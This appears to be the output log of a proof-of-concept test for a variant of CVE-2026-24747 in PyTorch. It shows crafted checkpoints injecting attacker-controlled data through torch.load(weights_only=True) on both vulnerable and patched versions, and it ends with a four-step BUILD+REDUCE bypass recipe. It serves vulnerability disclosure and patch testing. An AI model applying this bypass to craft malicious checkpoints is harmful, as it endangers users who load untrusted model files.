================================================================
CVE-2026-24747 VARIANT: BUILD + REDUCE UntypedStorage Bypass
================================================================


========================================
TEST 1: PyTorch 2.9.1 (VULNERABLE)
========================================
[*] Found PyTorch 2.9.1+cpu
--- Testing on: vuln ---
/home/vscode/.local/lib/python3.12/site-packages/torch/_subclasses/functional_tensor.py:279: UserWarning: Failed to initialize NumPy: No module named 'numpy' (Triggered internally at /pytorch/torch/csrc/utils/tensor_numpy.cpp:84.)
  cpu = _conversion_method_template(device=torch.device("cpu"))
[*] PyTorch version: 2.9.1+cpu
[+] Created exploit checkpoint: /tmp/cve_2026_24747_variant_vuln.pth (1234 bytes)
/home/vscode/.local/lib/python3.12/site-packages/torch/_subclasses/functional_tensor.py:279: UserWarning: Failed to initialize NumPy: No module named 'numpy' (Triggered internally at /pytorch/torch/csrc/utils/tensor_numpy.cpp:84.)
  cpu = _conversion_method_template(device=torch.device("cpu"))
[*] Loading checkpoint: /tmp/cve_2026_24747_variant_vuln.pth
[*] PyTorch version: 2.9.1+cpu
[+] torch.load(weights_only=True) succeeded!
[+] Tensor shape: torch.Size([10]), dtype: torch.float32
[+] Storage size: 40 bytes

[*] Verifying attacker-controlled values:
    t[0] =       1337.0  (expected       1337.0) [MATCH]
    t[1] =      31337.0  (expected      31337.0) [MATCH]
    t[2] =         42.0  (expected         42.0) [MATCH]
    t[3] =      57005.0  (expected      57005.0) [MATCH]
    t[4] =      48879.0  (expected      48879.0) [MATCH]
    t[5] =      51966.0  (expected      51966.0) [MATCH]
    t[6] =      47806.0  (expected      47806.0) [MATCH]
    t[7] =      64206.0  (expected      64206.0) [MATCH]
    t[8] =      10000.0  (expected      10000.0) [MATCH]
    t[9] =      12345.0  (expected      12345.0) [MATCH]

[*] Raw memory: 00 20 a7 44 00 d2 f4 46 00 00 28 42 00 ad 5e 47 00 ef 3e 47 00 fe 4a 47 00 be 3a 47 00 ce 7a 47 f6 3f 1c 46 00 e4 40 46

[+] ALL 10 MAGIC VALUES CONFIRMED
[+] Attacker-controlled data injected into tensor via BUILD+REDUCE bypass
[+] VARIANT WORKS on vulnerable version (2.9.1)

========================================
TEST 2: PyTorch 2.10.0 (FIXED/PATCHED)
========================================
[*] Found PyTorch 2.10.0+cpu
--- Testing on: fixed ---
/tmp/pytorch_fixed_venv/lib/python3.12/site-packages/torch/_subclasses/functional_tensor.py:283: UserWarning: Failed to initialize NumPy: No module named 'numpy' (Triggered internally at /pytorch/torch/csrc/utils/tensor_numpy.cpp:84.)
  cpu = _conversion_method_template(device=torch.device("cpu"))
[*] PyTorch version: 2.10.0+cpu
[+] Created exploit checkpoint: /tmp/cve_2026_24747_variant_fixed.pth (1234 bytes)
/tmp/pytorch_fixed_venv/lib/python3.12/site-packages/torch/_subclasses/functional_tensor.py:283: UserWarning: Failed to initialize NumPy: No module named 'numpy' (Triggered internally at /pytorch/torch/csrc/utils/tensor_numpy.cpp:84.)
  cpu = _conversion_method_template(device=torch.device("cpu"))
[*] Loading checkpoint: /tmp/cve_2026_24747_variant_fixed.pth
[*] PyTorch version: 2.10.0+cpu
[+] torch.load(weights_only=True) succeeded!
[+] Tensor shape: torch.Size([10]), dtype: torch.float32
[+] Storage size: 40 bytes

[*] Verifying attacker-controlled values:
    t[0] =       1337.0  (expected       1337.0) [MATCH]
    t[1] =      31337.0  (expected      31337.0) [MATCH]
    t[2] =         42.0  (expected         42.0) [MATCH]
    t[3] =      57005.0  (expected      57005.0) [MATCH]
    t[4] =      48879.0  (expected      48879.0) [MATCH]
    t[5] =      51966.0  (expected      51966.0) [MATCH]
    t[6] =      47806.0  (expected      47806.0) [MATCH]
    t[7] =      64206.0  (expected      64206.0) [MATCH]
    t[8] =      10000.0  (expected      10000.0) [MATCH]
    t[9] =      12345.0  (expected      12345.0) [MATCH]

[*] Raw memory: 00 20 a7 44 00 d2 f4 46 00 00 28 42 00 ad 5e 47 00 ef 3e 47 00 fe 4a 47 00 be 3a 47 00 ce 7a 47 f6 3f 1c 46 00 e4 40 46

[+] ALL 10 MAGIC VALUES CONFIRMED
[+] Attacker-controlled data injected into tensor via BUILD+REDUCE bypass

================================================================
[!!!] BYPASS CONFIRMED: Variant works on PATCHED version 2.10.0!
================================================================

The SETITEM/SETITEMS fix is bypassed via BUILD + REDUCE:
  1. REDUCE(_codecs.encode, (payload, 'latin-1')) -> attacker bytes
  2. REDUCE(UntypedStorage, (bytes,)) -> attacker-controlled storage
  3. BUILD tensor with set_(storage, 0, Size, stride)
  4. Tensor now contains attacker-controlled data!

The BUILD handler for Tensor calls inst.set_(*state) without
any validation. UntypedStorage is in _get_allowed_globals().

========================================
SUMMARY
========================================
Vulnerable (2.9.1): EXPLOITABLE
Fixed (2.10.0):     STILL EXPLOITABLE (BYPASS!)

Log files:
  /data/pruva/runs/37ad5a77-01bf-42ec-84eb-f7160ac00a7b/logs/variant_vuln.log
  /data/pruva/runs/37ad5a77-01bf-42ec-84eb-f7160ac00a7b/logs/variant_fixed.log

EXIT 0: True bypass confirmed - variant works on patched version